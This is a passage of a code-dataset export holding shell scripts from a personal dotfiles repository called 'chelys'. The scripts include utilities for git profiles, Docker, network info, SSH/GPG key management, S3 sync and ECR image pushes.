"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 105,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 9,
"path": "/includes/tower.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\ntower() {\n if [[ $1 ]]; then\n open $1 -a Tower\n else\n open . -a Tower\n fi\n}\n"
},
{
"alpha_fraction": 0.5828947424888611,
"alphanum_fraction": 0.5878289341926575,
"avg_line_length": 30.020408630371094,
"blob_id": "9ab49204113ae5144ee69d7c06368249e1dcd72d",
"content_id": "1cae0bec279376c8c28e322d4a88e66cee91b651",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 3040,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 98,
"path": "/bin/git-profile",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Manage git configurations in a profile-like way\n#\n# Usage:\n# git profile list\n# git profile use work\n# git profile save default\n# git profile backup\n#\n# Options:\n# help|-h show this help menu\n# list|-l list available profiles\n# use|-u <name> switch ~/.gitconfig to a given profile name\n# save|-s <name> save/overwrite profile with the current ~/.gitconfig\n# backup|-b create a backup of the current ~/.gitconfig\"\n\n[[ $COLOR_CLEAR ]] || COLOR_CLEAR='\\e[0m'\n[[ $COLOR_WARN ]] || COLOR_WARN='\\e[1;33mWARNING:'\n[[ $COLOR_ERROR ]] || COLOR_ERROR='\\e[1;31mERROR:'\n\nGIT_PROFILE_SCRIPT_PATH=\"$0\"\n\ngit_profile() {\n $(git_profile_init)\n\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'use'|u) git_profile_use $@;;\n 'list'|l) git_profile_list;;\n 'save'|s) git_profile_save $@;;\n 'backup'|b) git_profile_backup;;\n 'help'|'--help'|-h|h|'') git_profile_help $@;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\ngit_profile_init() {\n if ! [[ -d ~/.git_profiles ]]; then\n echo \"~/.git_profiles directory not found, creating...\"\n mkdir -p ~/.git_profiles/backups\n if [ -f ~/.gitconfig ]; then\n echo \"Saving ~/.gitconfig to default. Run 'git profile help' for usage\"\n cp ~/.gitconfig ~/.git_profiles/default.gitconfig\n fi\n fi\n}\n\ngit_profile_help() {\n sed '/^#\\!.*/d' $GIT_PROFILE_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\ngit_profile_backup() {\n local timestamp=`date +%s`\n echo \"Backing up current config to ~/.git_profiles/backups/$timestamp\"\n cp ~/.gitconfig ~/.git_profiles/backups/$timestamp\n}\n\ngit_profile_list() {\n ls ~/.git_profiles | grep '.gitconfig' | sed 's/\\.gitconfig//g'\n}\n\ngit_profile_use() {\n profile_name=\"$1\"\n if [[ ! \"$profile_name\" || \"$profile_name\" == \"use\" ]]; then\n echo \"Must pass in a profile name. Use 'git profile list' to see available profiles.\"\n exit 1\n fi\n profile_path=~/.git_profiles/$profile_name.gitconfig\n if [ -f $profile_path ]; then\n git_profile_backup\n echo \"Switching ~/.gitconfig to profile '$profile_name'\"\n cp -f $profile_path ~/.gitconfig\n else\n echo \"Path $profile_path not found. Use 'git profile list' to see available profiles.\"\n exit 1\n fi\n}\n\ngit_profile_save() {\n profile_name=\"$1\"\n if [[ ! \"$profile_name\" || \"$profile_name\" == \"save\" ]]; then\n echo \"Must pass in a profile name. Use 'git profile list' to see available profiles.\"\n exit 1\n fi\n profile_path=~/.git_profiles/$profile_name.gitconfig\n timestamp=`date +%s`\n if [ -f $profile_path ]; then\n echo \"Backing up $profile_path to ~/.git_profiles/backups/$timestamp\"\n mv $profile_path ~/.git_profiles/backups/$timestamp\n fi\n echo \"Saving current git config as '$profile_name'\"\n cp -f ~/.gitconfig $profile_path\n}\n\ngit_profile $@\n"
},
{
"alpha_fraction": 0.42840376496315,
"alphanum_fraction": 0.43192487955093384,
"avg_line_length": 18.813953399658203,
"blob_id": "20d33a647f5eac1e77f14f332478bc0247917c79",
"content_id": "90c9536e30d326e1ea2225a18a458665687bb170",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 852,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 43,
"path": "/includes/docker.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\nd() {\n case $1 in\n \"stop\")\n docker stop $(docker ps -a -q)\n ;;\n \"remove\")\n docker stop $(docker ps -a -q)\n docker rm $(docker ps -a -q)\n ;;\n \"clean\")\n docker stop $(docker ps -a -q)\n docker rm $(docker ps -a -q)\n docker system prune --all --volumes\n ;;\n *) docker $@;;\n esac\n}\n\nds() {\n case $1 in\n \"restart\")\n docker-sync stop\n docker-sync clean\n docker-sync start\n ;;\n *) docker-sync $@;;\n esac\n}\nalias dss=\"docker-sync-stack\"\n\ndc() {\n case $1 in\n \"restart\")\n docker-compose restart\n ;;\n \"services\")\n docker-compose up -d database elasticsearch redis\n ;;\n *) docker-compose $@;;\n esac\n}\n"
},
{
"alpha_fraction": 0.5916278958320618,
"alphanum_fraction": 0.5981395244598389,
"avg_line_length": 62.235294342041016,
"blob_id": "9dbb3768665e3bc1b6cbe8dde77eb7fdcb431f5c",
"content_id": "006894de3089ef11dd4d3a5db4d1f475b94b502b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1075,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 17,
"path": "/includes/network.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "# ------------------------------------------------------------\n# - Interfaces\n# ------------------------------------------------------------\n\n# `ip` tool is in commands\nalias ips='ip -l -v'\nalias digip='dig +short myip.opendns.com @resolver1.opendns.com' # Faster public IP\nalias whatismyip='curl https://ifconfig.co' # Public facing IP Address\nalias netCons='lsof -i' # Show all open TCP/IP sockets\nalias flushDNS='dscacheutil -flushcache' # Flush out the DNS Cache\nalias lsock='sudo /usr/sbin/lsof -i -P' # Display open sockets\nalias lsockU='sudo /usr/sbin/lsof -nP | grep UDP' # Display only open UDP sockets\nalias lsockT='sudo /usr/sbin/lsof -nP | grep TCP' # Display only open TCP sockets\nalias ipInfo0='ipconfig getpacket en0' # Get info on connections for en0\nalias ipInfo1='ipconfig getpacket en1' # Get info on connections for en1\nalias openPorts='sudo lsof -i | grep LISTEN' # All listening connections\nalias showBlocked='sudo ipfw list' # All ipfw rules inc/ blocked IPs\n"
},
{
"alpha_fraction": 0.5601503849029541,
"alphanum_fraction": 0.5684210658073425,
"avg_line_length": 24.576923370361328,
"blob_id": "449940ffced24620a4459524e274b09ee1e55777",
"content_id": "4d9169e2f8965ba830e0ad593338bd2331204d3e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1330,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 52,
"path": "/bin/git-jira",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Shortcuts for getting to Jira tickets from the current branch based on the branch name and directory the repo is in.\n#\n# Usage:\n# git jira url\n# git jira open\n#\n# Options:\n# help|-h show this help menu\n# url url the current branch's predicted Jira URL\n# open open the current branch's predicted Jira URL\n\n[[ $COLOR_CLEAR ]] || COLOR_CLEAR='\\e[0m'\n[[ $COLOR_WARN ]] || COLOR_WARN='\\e[1;33mWARNING:'\n[[ $COLOR_ERROR ]] || COLOR_ERROR='\\e[1;31mERROR:'\n\nGIT_JIRA_SCRIPT_PATH=\"$0\"\n\ngit_jira() {\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'url'|d) git_jira_url $@;;\n 'open'|d) git_jira_open $@;;\n 'help'|'--help'|-h|h|'') git_jira_help $@;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\ngit_jira_help() {\n sed '/^#\\!.*/d' $GIT_JIRA_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\ngit_jira_ticket_id() {\n git rev-parse --abbrev-ref HEAD | cut -d'/' -f1\n}\n\ngit_jira_organization_name() {\n basename $(dirname \"`git rev-parse --show-toplevel`\") | tr '[:upper:]' '[:lower:]'\n}\n\ngit_jira_url() {\n echo \"https://$(git_jira_organization_name).atlassian.net/browse/$(git_jira_ticket_id)\"\n}\n\ngit_jira_open() {\n open \"$(git_jira_url)\"\n}\n\ngit_jira $@\n"
},
{
"alpha_fraction": 0.5163204669952393,
"alphanum_fraction": 0.5163204669952393,
"avg_line_length": 36.44444274902344,
"blob_id": "a794f34b3236e450a6e981aaa6a714f5afeb7327",
"content_id": "c988b6759a56ded93a2faaae394e30b45bd0c9d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 337,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 9,
"path": "/bin/whereis",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n__results=`curl -s https://api.ipdata.co/$@`\n__city=\"`echo \"$__results\" | jp -u 'city'`\"\n__region=\"`echo \"$__results\" | jp -u 'region'`\"\n__country=\"`echo \"$__results\" | jp -u 'country_name'`\"\n[[ \"$__city\" ]] && printf \"$__city, \"\n[[ \"$__region\" ]] && printf \"$__region, \"\n[[ \"$__country\" ]] && printf \"$__country\\n\"\n"
},
{
"alpha_fraction": 0.5245901346206665,
"alphanum_fraction": 0.5404548048973083,
"avg_line_length": 24.904109954833984,
"blob_id": "f8eeaba494fbdc1fe70dfbe06fc79078bc6a987b",
"content_id": "72c6881bc398342acf2b5ea9f50583f4fffd71cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1891,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 73,
"path": "/bin/s3-sync-buckets",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Upload or download a S3 buckets to the current directory\n#\n# Usage:\n# s3-sync-buckets upload <BUCKETS>\n# s3-sync-buckets download <BUCKETS>\n# s3-sync-buckets download <BUCKETS> --profile <PROFILE>\n#\n# Options:\n# help|-h show this help menu\n# --profile which AWS named profile to use for the S3 commands\n\n[[ $COLOR_CLEAR ]] || COLOR_CLEAR='\\e[0m'\n[[ $COLOR_WARN ]] || COLOR_WARN='\\e[1;33mWARNING:'\n[[ $COLOR_ERROR ]] || COLOR_ERROR='\\e[1;31mERROR:'\n\nS3_SYNC_BUCKETS_SCRIPT_PATH=\"$0\"\n\ns3_sync_buckets() {\n local _cmd=$1 _buckets _profile=\"default\" _skip\n [[ $_cmd ]] && shift\n\n for arg in $@; do\n if [[ \"$arg\" = \"--profile\" ]]; then\n _profile=\"$2\"\n _skip=true\n elif [ $_skip ]; then\n _skip=false\n else\n _buckets+=(\"$arg\")\n fi\n shift\n done\n\n if [[ !\"$_buckets\" ]]; then\n echo \"Listing buckets...\"\n for _bucket in `aws s3 ls --profile $_profile | cut -d' ' -f3`; do\n _buckets+=(\"$_bucket\")\n done\n fi\n\n case $_cmd in\n 'upload'|u) git_sync_buckets_download $_profile $_buckets;;\n 'download'|d) git_sync_buckets_upload $_profile $_buckets;;\n 'help'|'--help'|-h|h|'') s3_sync_buckets_help;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\ns3_sync_buckets_help() {\n sed '/^#\\!.*/d' $S3_SYNC_BUCKETS_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\ngit_sync_buckets_download() {\n local _profile=$1\n shift\n\n for _bucket in $@; do\n echo \"aws s3 sync $_bucket s3://$_bucket --profile $_profile\"\n done\n}\n\ngit_sync_buckets_upload() {\n local _profile=$1\n shift\n\n for _bucket in $@; do\n echo \"aws s3 sync s3://$_bucket $_bucket --profile $_profile\"\n done\n}\n\ns3_sync_buckets $@\n"
},
{
"alpha_fraction": 0.6326987743377686,
"alphanum_fraction": 0.6338185667991638,
"avg_line_length": 27.80645179748535,
"blob_id": "b76d5f8a3c8f66e42dfdf8d9ee39d90097cc99d7",
"content_id": "be71f3322ad92d6063f81e3746e6c84047ce3073",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 893,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 31,
"path": "/bin/git-ignore",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Open or add files directly to .gitignore of the current repository. Can be\n# run in sub-directories and will automatically add a relative path to the\n# repository root if. Passing no arguments will open the .gitignore file in\n# the editor specified by the $EDITOR environment variable.\n#\n# Usage:\n# git ignore\n# git ignore <FILES...>\n\ngit_ignore() {\n local repo=$(git rev-parse --show-toplevel)\n local gitignore=\"$repo/.gitignore\"\n local workdir=$(pwd)\n local file\n local arg\n\n # If no args just open in editor\n [[ -z $@ ]] && $EDTIOR $gitignore && return 0\n\n for file in $@; do\n # If file is in working directory, add as path relative to repo root\n [[ -f $file ]] && file=$(echo \"$workdir/$file\" | sed 's,'$repo/',,g')\n\n echo \"$file\" >> $gitignore\n echo \"Added '$file' to $gitignore\"\n done\n}\n\ngit_ignore $@\n"
},
{
"alpha_fraction": 0.5639490485191345,
"alphanum_fraction": 0.5743896961212158,
"avg_line_length": 32.224491119384766,
"blob_id": "eed85b190bd0c3e8239f3f6da41fa863a668ca64",
"content_id": "9164e58cb1a13f091bfeb2d993a1d8686eadcc02",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 6513,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 196,
"path": "/bin/key-manager",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Manage GPG and SSH keys\n#\n# Usage:\n# key-manager new gpg [email protected] 'Jane Doe'\n# key-manager new ssh [email protected]\n# key-manager extend gpg [email protected]\n# key-manager use [email protected]\n# key-manager which [email protected]\n# key-manager backup\n#\n# Options:\n# help|-h show this help menu\n# new|-n create a new GPG or SSH key\n# extend|-e extend an existing GPG key\n# use|-u switch Git signing and SSH id_rsa.pub keys to keys with this email\n# which|-w show key files that contain the email\n# backup|-b create a backup of the ~/.gnupg and ~/.ssh directories\n\n[[ $CLR ]] || CLR='\\033[0m'\n[[ $WRN ]] || WRN='\\033[1;33mWARNING:'\n[[ $ERR ]] || ERR='\\033[0;31mERROR:'\n\nKEY_MANAGER_SCRIPT_PATH=\"$0\"\n\nnext_year() {\n date -v+13m +%Y\n}\n\nsanitize() {\n echo $@ | sed -e 's/[^A-Za-z0-9_-]/_/g'\n}\n\nkey_manager_help() {\n sed '/^#\\!.*/d' $KEY_MANAGER_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\nkey_manager_init() {\n if ! [[ -d ~/.key_manager ]]; then\n echo \"~/.key_manager directory not found, creating...\"\n # mkdir -p ~/.key_manager/backups\n # # if [ -f ~/.gitconfig ]; then\n # # echo \"Saving ~/.gitconfig to default. Run 'git profile help' for usage\"\n # # cp ~/.gitconfig ~/.key_manager/default.gitconfig\n # # fi\n # [commit]\n # gpgsign = true\n # [gpg]\n # program = /usr/local/bin/gpg\n fi\n}\n\nkey_manager() {\n $(key_manager_init)\n\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'new'|n) key_manager_new $@;;\n 'use'|n) key_manager_use $@;;\n 'extend'|e) key_manager_extend $@;;\n 'backup'|b) key_manager_backup;;\n 'help'|'--help'|-h|h|'') key_manager_help;;\n *) echo -e \"$ERR '$_cmd' is not a valid command $CLR\" && return 1;;\n esac\n}\n\nkey_manager_new() {\n local _key_type=$1\n [[ $_key_type ]] && shift\n\n case $_key_type in\n 'gpg') key_manager_new_gpg $@;;\n 'ssh') key_manager_new_ssh $@;;\n '') echo -e \"$ERR must pass a key type $CLR\" && return 1;;\n *) echo -e \"$ERR '$_key_type' is not a valid key type $CLR\" && return 1;;\n esac\n}\n\nkey_manager_extend() {\n local _key_type=$1\n [[ $_key_type ]] && shift\n\n case $_key_type in\n 'gpg') key_manager_extend_gpg $@;;\n 'ssh') echo -e \"$ERR not a valid key type $CLR\" && return 1;;\n '') echo -e \"$ERR must pass a key type $CLR\" && return 1;;\n *) echo -e \"$ERR '$_key_type' is not a valid key type $CLR\" && return 1;;\n esac\n}\n\nkey_manager_new_gpg() {\n local email=$1 && shift\n local name=$@ tmp=mktemp\n [[ -z \"$email\" ]] && echo -e \"$ERR Must pass email $CLR\" && exit 1\n [[ -z \"$name\" ]] && echo -e \"$ERR Must pass name $CLR\" && exit 1\n [[ `gpg -k` == *\"$email\"* ]] && echo -e \"$ERR Key for $email already exists $CLR\" && exit 1\n\n read -s -p \"Enter a passphrase: \" passphrase\n echo \"\n Key-Type: 1\n Key-Length: 4096\n Subkey-Type: 1\n Subkey-Length: 4096\n Name-Real: $name\n Name-Email: $email\n Passphrase: $passphrase\n Expire-Date: `next_year`0101T000000\n \"> $tmp\n gpg --batch --generate-key $tmp\n}\n\nkey_manager_extend_gpg() {\n local email=$1\n}\n\nkey_manager_new_ssh() {\n local email=$1\n local new_key_file=`sanitize $email`\n [[ -z \"$email\" ]] && echo -e \"$ERR Must pass email $CLR\" && exit 1\n existing_key_file=`grep -r \"$email\" ~/.ssh | cut -d\":\" -f1`\n [[ $existing_key_file ]] && echo -e \"$ERR Key for $email already exists in $existing_key_file $CLR\" && exit 1\n\n ssh-keygen -t rsa -C \"$email\" -f ~/.ssh/$new_key_file\n echo -e \"Created new key files:\\n~/.ssh/$new_key_file\\n~/.ssh/$new_key_file.pub\"\n}\n\nkey_manager_use() {\n set -e\n local email=$1\n [[ -z \"$email\" ]] && echo -e \"$ERR Must pass email $CLR\" && exit 1\n\n ssh_public_key_file=`grep -r \"$email\" ~/.ssh | cut -d\":\" -f1`\n ssh_private_key_file=`echo $ssh_public_key_file | sed 's/\\.pub//g'`\n if [[ -z $ssh_public_key_file ]]; then\n echo -e \"$ERR Could not find SSH key for $email (no files containing that email exist in ~/.ssh) $CLR\"\n return 1\n fi\n if [[ `basename $ssh_public_key_file` == \"id_rsa.pub\" ]]; then\n echo -e \"$ERR Already using SSH key for $email (~/.ssh/id_rsa.pub contains that email) $CLR\"\n return 1\n fi\n if ! [[ -f $ssh_private_key_file ]]; then\n echo -e \"$ERR Could not find private SSH key file for public SSH key file `basename $ssh_public_key_file` (`basename $ssh_private_key_file` does not exist in ~/.ssh) $CLR\"\n return 1\n fi\n\n current_ssh_email=`cat ~/.ssh/id_rsa.pub | cut -d' ' -f3`\n current_ssh_email_sanitized=`sanitize $current_ssh_email`\n current_ssh_public_key_file_new_path=\"~/.ssh/$current_ssh_email_sanitized.pub\"\n current_ssh_private_key_file_new_path=\"~/.ssh/$current_ssh_email_sanitized\"\n if [[ -f $current_ssh_public_key_file_new_path ]]; then\n echo -e \"$ERR Cannot move ~/id_rsa.pub to $current_ssh_public_key_file_new_path (file with that name already exists) $CLR\"\n return 1\n fi\n if [[ -f $current_ssh_private_key_file_new_path ]]; then\n echo -e \"$ERR Cannot move ~/id_rsa to $current_ssh_private_key_file_new_path (file with that name already exists) $CLR\"\n return 1\n fi\n\n # key_manager_backup\n\n mv ~/.ssh/id_rsa.pub $current_ssh_public_key_file_new_path\n mv ~/.ssh/id_rsa $current_ssh_private_key_file_new_path\n return\n mv $ssh_public_key_file ~/.ssh/id_rsa.pub\n mv $ssh_private_key_file ~/.ssh/id_rsa\n\n echo \"Now using SSH key for $email\"\n}\n\nkey_manager_configure_git_signing() {\n gpg --list-secret-keys --keyid-format LONG\n # signingkey=`git config user.signingkey`\n # gpg --list-keys $signingkey\n # git config --global user.signingkey 3AA5C34371567BD2\n}\n\nkey_manager_backup() {\n set -e\n local timestamp=`date -u +%Y-%m-%dT%H%M%S`\n local backup_path=~/.key_manager/backups\n local gpg_backup_path=$backup_path/dot-gnupg/$timestamp\n local ssh_backup_path=$backup_path/dot-ssh/$timestamp\n echo \"Creating backup with timestamp $timestamp\"\n mkdir -p $ssh_backup_path\n rsync -av --no-specials --no-devices ~/.ssh/ $ssh_backup_path/\n mkdir -p $gpg_backup_path\n rsync -av --no-specials --no-devices ~/.gnupg/ $gpg_backup_path/\n echo \"Backed up gpg to $ssh_backup_path\"\n echo \"Backed up ssh to $gpg_backup_path\"\n}\n\nkey_manager $@\n\n"
},
{
"alpha_fraction": 0.5926828980445862,
"alphanum_fraction": 0.6019512414932251,
"avg_line_length": 32.6065559387207,
"blob_id": "6c0ca688a689438491f4fd31bf27c6c4dbb9d2f4",
"content_id": "f16e20f19eef92b7fd84a82455ce6502c22e3501",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2050,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 61,
"path": "/bin/ecs-update-image",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Builds from scratch, tags, and pushes a Dockerfile to an ECS repository\n# Add `# REPO: repo/name` to the first line of the Dockerfile to specify which\n# repository to push the built image to (also controls tagging)\n\nAWS_ACCOUNT_ID=`aws sts get-caller-identity | jp -u Account`\nAWS_REGION=`aws configure get region`\n\necho \"Using AWS account $AWS_ACCOUNT_ID in $AWS_REGION...\"\n\nconfirm() {\n [[ $_auto_yes ]] && return 1\n [[ $_silent ]] && return 0\n # xaple: confirm \"Do the thing?\" && [ \"$?\" == 0 ] && exit 1\n while true; do\n read -r -p \"${1:-Are you sure?} [y/n]: \" RESP\n case $RESP in\n [yY][eE][sS]|[yY]) return 1;;\n [nN][oO]|[nN]) return 0;;\n *) echo \"Please enter y(es) or n(o)\";;\n esac\n done\n}\n\nDOCKER_FILES=`find $PWD -name Dockerfile`\nfor file in $DOCKER_FILES; do\n\n echo \"Processing $file...\"\n\n FILE_HEAD=`head -n1 $file`\n if [[ $FILE_HEAD == *'# REPO: '* ]]; then\n REPO_NAME=\"`echo $FILE_HEAD | awk '{print $3}'`\"\n else\n REPO_NAME=\"`basename $(dirname $file)`\"\n fi\n\n confirm \"Do you want to rebuild $file from scratch?\"\n if [[ \"$?\" == 1 ]]; then\n docker build --force-rm --no-cache -t $REPO_NAME .\n fi\n\n REMOTE_REPO=\"$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/$REPO_NAME:latest\"\n confirm \"Tag and push local $REPO_NAME:latest to $REMOTE_REPO?\"\n if [[ \"$?\" == 1 ]]; then\n echo \"Tagging $file as $REPO_NAME:latest\"\n docker tag $REPO_NAME:latest $AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/$REPO_NAME:latest\n echo \"Pushing $REPO_NAME:latest to $REMOTE_REPO\"\n docker push $REMOTE_REPO\n if [ $? != 0 ]; then\n GET_ECR_LOGIN=\"aws ecr get-login --no-include-email --region $AWS_REGION\"\n confirm \"Push failed, do you want to run '$GET_ECR_LOGIN'?\"\n [ $? == 1 ] && ECR_LOGIN=\"`$GET_ECR_LOGIN`\" || exit 1\n confirm \"Do you want to run '$ECR_LOGIN'?\"\n [ $? == 1 ] && `\"$ECR_LOGIN\"` || exit 1\n [ $? == 0 ] && confirm \"Do you want to try pushing again?\"\n [ $? == 1 ] && docker push $REMOTE_REPO || exit 1\n fi\n fi\n\ndone\n"
},
{
"alpha_fraction": 0.5763813853263855,
"alphanum_fraction": 0.5904658436775208,
"avg_line_length": 26.969696044921875,
"blob_id": "3de669cac6be50aa496a7a859cbc76f43768ade8",
"content_id": "15112feef0bd5856757e0ac94e6a81df55c319ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 923,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 33,
"path": "/bin/sshp",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Open an interactive shell or run a command through a tunnel using another SSH server as a proxy\n#\n# Usage:\n# sshp <PROXY HOST> <DESTINATION HOST>\n# sshp <PROXY HOST> <DESTINATION HOST> <COMMAND>\n#\n# Options:\n# help|-h show this help menu\n\n[[ $CLR ]] || CLR='\\e[0m'\n[[ $WRN ]] || WRN='\\e[1;33mWARNING:'\n[[ $ERR ]] || ERR='\\e[1;31mERROR:'\n\nSSH_PROXY_SCRIPT_PATH=\"$0\"\n\nssh_proxy_help() {\n sed '/^#\\!.*/d' $SSH_PROXY_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n exit 0\n}\n\ncase $1 in\n 'help'|'--help'|-h|h|'') ssh_proxy_help $@;;\nesac\n\nlocal tunnel_host=$1 destination_host=$2 errors\n\n[[ -z $tunnel_host ]] && errors=\"$ERR tunnel host must be set$CLR\\n\"\n[[ -z $destination_host ]] && errors=\"$errors$ERR destination host must be set$CLR\"\n[[ $errors ]] && echo -e \"$errors\" && exit 1\n\nssh $destination_host -o \"proxycommand ssh -W %h:%p $tunnel_host\"\n"
},
{
"alpha_fraction": 0.5017793774604797,
"alphanum_fraction": 0.5124555230140686,
"avg_line_length": 24.545454025268555,
"blob_id": "536128996632bd4f838fc0e6489c503adb3b5709",
"content_id": "f8dbb3451f4ff9b7386be9102156cec0bd3876d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 281,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 11,
"path": "/includes/tunnels.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "tunnels() {\n local _tunnel_pids\n _tunnel_pids=`ps aux | grep [s]sh | awk '{print $2}'`\n if ! [[ $_tunnel_pids ]]; then\n echo \"No SSH tunnels found\"\n fi\n case $1 in\n \"list\" ) echo $_tunnel_pids;;\n \"kill\" ) sudo kill -9 $_tunnel_pids;;\n esac\n}\n"
},
{
"alpha_fraction": 0.6664025187492371,
"alphanum_fraction": 0.6711568832397461,
"avg_line_length": 26.434782028198242,
"blob_id": "26c71fcc8df0a9ff6640fc6d661e6a2f974a69ee",
"content_id": "10a4d0be006ba30e4b2d20dc6b2f7278b33d09a4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1262,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 46,
"path": "/bin/git-sync",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# A simple bash script to run git pull in a directory of repos. Automatically\n# detects whether each directory is a git repository, and can optionally\n# checkout a branch before pulling using the `-b <branch-name>` argument.\n\n# Save original working directory\n_ORIGINAL_PWD=\"$PWD\"\n\n# Parse args\nwhile getopts \":b:\" opt; do\n case $opt in\n b) SYNC_BRANCH=$OPTARG;;\n \\?) echo \"Invalid option: -$OPTARG\" >&2;;\n esac\ndone\n\n# Find all git repos in the current directory or pull the current directory\nREPOS_DIR=\"$PWD\"\nif [ -d \"$REPOS_DIR/.git\" ]; then\n REPOS=\"$REPOS_DIR\"\nelse\n REPOS=\"`find $REPOS_DIR -name .git -maxdepth 2 -type d`\"\nfi\n\n# Sort repo list alphabetically\nREPOS=`echo \"$REPOS\" | sort --ignore-case`\n\n# CD into each directory, optionally checkout a branch, and pull\nfor REPO in $REPOS; do\n # git branch --short\n echo \"Pulling `basename $(dirname $REPO)`\"\n cd `dirname $REPO`\n [ $SYNC_BRANCH ] && git checkout $SYNC_BRANCH\n __pull_results=`git pull 2>&1`\n if [[ $? != 0 ]]; then\n echo \"Error: $REPO could not be pulled\"\n printf \"$__pull_results\"\n exit 1\n elif [[ \"$__pull_results\" != \"Already up-to-date.\" ]]; then\n printf \"$__pull_results\"\n fi\ndone\n\n# Go back to the original directory\ncd $_ORIGINAL_PWD\n"
},
{
"alpha_fraction": 0.693965494632721,
"alphanum_fraction": 0.693965494632721,
"avg_line_length": 22.200000762939453,
"blob_id": "a7b12c2e8469c6a66b76b7f4142173a41b72c5da",
"content_id": "189231fbca9170be272a9891d700143e938adbbd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 232,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 10,
"path": "/README.md",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "# Chelys\n\nChelys is a utility for managing the stuff upon which my world rests.\n\n## Installation\n\n**ZSH**\n```shell\ngit clone https://github.com/MartinHarding/chelys.git ~/.chelys && echo 'source ~/.chelys/chelys.sh' >> ~/.zshrc\n```\n"
},
{
"alpha_fraction": 0.6990740895271301,
"alphanum_fraction": 0.7037037014961243,
"avg_line_length": 42.20000076293945,
"blob_id": "cffef823ffc32f2a60ceeede45dd3c9fb5599ec1",
"content_id": "3bd9d2df6a7bab17ace7cea9f19c6262937919f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 216,
"license_type": "permissive",
"max_line_length": 173,
"num_lines": 5,
